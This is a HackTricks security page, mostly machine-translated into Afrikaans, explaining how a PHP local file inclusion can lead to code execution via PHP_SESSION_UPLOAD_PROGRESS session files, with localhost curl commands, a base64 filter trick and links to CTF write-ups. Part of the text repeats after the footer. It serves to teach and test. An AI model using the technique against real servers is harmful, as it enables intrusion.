LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Basiese Inligting

As jy 'n Plaaslike Lêer Insluiting gevind het selfs al het jy nie 'n sessie nie en session.auto_start is Off. As session.upload_progress.enabled is On en jy verskaf die PHP_SESSION_UPLOAD_PROGRESS in multipart POST data, sal PHP die sessie vir jou aktiveer.

$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
$ ls -a /var/lib/php/sessions/
. ..
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -d 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah'
$ ls -a /var/lib/php/sessions/
. ..
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -F 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah'  -F 'file=@/etc/passwd'
$ ls -a /var/lib/php/sessions/
. .. sess_iamorange

In the last example the session will contain the string blahblahblah

Note that with PHP_SESSION_UPLOAD_PROGRESS you can beheer data binne die sessie, so as jy jou sessie lêer insluit, kan jy 'n deel insluit wat jy beheer (soos 'n php shellcode).

Alhoewel die meeste tutorials op die Internet jou aanbeveel om session.upload_progress.cleanup op Off te stel vir foutopsporing. Die standaard session.upload_progress.cleanup in PHP is steeds On. Dit beteken jou oplaaivordering in die sessie sal so gou as moontlik skoongemaak word. So dit sal 'n Race Condition wees.

Die CTF

In die oorspronklike CTF waar hierdie tegniek kommentaar gelewer is, was dit nie genoeg om die Race Condition te benut nie, maar die inhoud wat gelaai is, moes ook met die string @<?php begin.

As gevolg van die standaardinstelling van session.upload_progress.prefix, sal ons SESSIE lêer begin met 'n irriterende voorvoegsel upload_progress_ Soos: upload_progress_controlledcontentbyattacker

Die truuk om die beginvoorvoegsel te verwyder was om die payload 3 keer te base64encode en dit dan via convert.base64-decode filters te decodeer, dit is omdat wanneer base64 decoding PHP die vreemde karakters sal verwyder, so na 3 keer sal slegs die payload gestuur deur die aanvaller oorbly (en dan kan die aanvaller die aanvanklike deel beheer).

Meer inligting in die oorspronklike skrywe https://blog.orange.tw/2018/10/ en finale eksploit https://github.com/orangetw/My-CTF-Web-Challenges/blob/master/hitcon-ctf-2018/one-line-php-challenge/exp_for_php.py Nog 'n skrywe in https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousLFI2RCE via Nginx temp files NextLFI2RCE via Segmentation Fault

Last updated 6 days ago

Basiese Inligting

$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
$ ls -a /var/lib/php/sessions/
. ..
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -d 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah'
$ ls -a /var/lib/php/sessions/
. ..
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange' -F 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah'  -F 'file=@/etc/passwd'
$ ls -a /var/lib/php/sessions/
. .. sess_iamorange

In the last example the session will contain the string blahblahblah

Note that with PHP_SESSION_UPLOAD_PROGRESS you can beheer data binne die sessie, so as jy jou sessie lêer insluit, kan jy 'n deel insluit wat jy beheer (soos 'n php shellcode).

Die CTF

In die oorspronklike CTF waar hierdie tegniek kommentaar gelewer is, was dit nie genoeg om die Race Condition te benut nie, maar die inhoud wat gelaai is, moes ook met die string @<?php begin.